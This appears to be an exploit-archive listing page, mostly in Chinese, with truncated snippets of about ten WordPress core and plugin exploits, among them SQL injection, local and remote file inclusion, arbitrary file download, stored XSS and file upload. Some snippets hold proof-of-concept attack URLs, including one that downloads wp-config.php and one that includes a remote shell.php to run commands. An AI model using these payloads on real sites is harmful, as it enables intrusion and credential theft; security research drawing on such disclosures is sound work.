wordpress漏洞

WordPress 5.0 远程代码执行

WordPress Core 5.0 - Remote Code Execution Exploit var wpnonce = ''; var ajaxnonce = ''; var wp_attached_file = ''; var imgurl = ''; var postajaxdata = ''; var post_id = 0; var cmd = '<!--?php phpinfo();/*'; var ...

WordPress Ultimate Product Catalogue 4.2.2 Plugin – SQL Injection

# Version: 4.2.2 # Tested on: Ubuntu 16.04 1 - Description: Type user access: register user. $_POST[‘CatID’] is not escaped. http://lenonleite.com.br/en/blog/2017/05/31/english-ultimate-product-catalogue-4-2-2-sql-inj...

WordPress Huge-IT Video Gallery 2.0.4 SQL注入

Advisory ID: DC-2017-01-009 SQL injection Vulnerable Function: $wpdb->get_var( $query ); Vulnerable Variable: $_POST['cat_search'] Vulnerable URL: http://www.vulnerablesite.com/wp-admin/admi...

WordPress KittyCatfish 2.2 Plugin SQL Injection Vulnerability

1. Description An unescaped parameter was found in KittyCatfish version 2.2 (WP plugin). An attacker can exploit this vulnerability to read from the database. The get oarameter 'kc_ad' is vulnerable. 2. Proof of conc...

WordPress强制下载任意文件下载漏洞

###################### # PoC ###################### # [+] Using `force-download.php` file from `Wordpress websites we can download any file. # # [!] http://ihonker.org/force-download.php?file=wp-config.php # ##...

WordPress WP Fastest Cache 0.8.5.9 文件包含漏洞

WordPress WP Fastest Cache plugin version 0.8.5.9 suffers from a local file inclusion vulnerability. <html> <body> <form action="http://<target>/wp-admin/admin-ajax.php" meth...

WordPress Karma 4.7 – Responsive Theme Exploit

<?php /** * Exploit Title: Karma Theme Exploit * Version: 4.7 * Tested on: Debian 8, PHP 5.6.17-3 * Type: Authenticated Options overwrite, Stored XSS * Time line: Found [28-Apr-2016], Vendor notified [...

WordPress Abtest本地文件包含漏洞

出现漏洞的文件为：abtest_admin.php <?php require 'admin/functions.php'; if (isset($_GET['action'])) { include 'admin/' . $_GET['action'] . '.php'; } else { include 'admin/list_experimen...

WordPress Site Import Plugin 1.0.1本地和远程文件包含漏洞

POC 远程文件包含 == http://localhost/wordpress/wp-content/plugins/site-import/admin/page.php?url=http%3a%2f%2flocalhost%2fshell.php?shell=ls 本地文件包含 == http://localhost/wordpress/wp-content/plugins/site-import...

WordPress Front-end Editor上传漏洞

Description: The WordPress Front-end Editor plugin contains an authenticated file upload vulnerability. We can upload arbitrary files to the upload folder, because the plugin also uses it's own file upload mechanism i...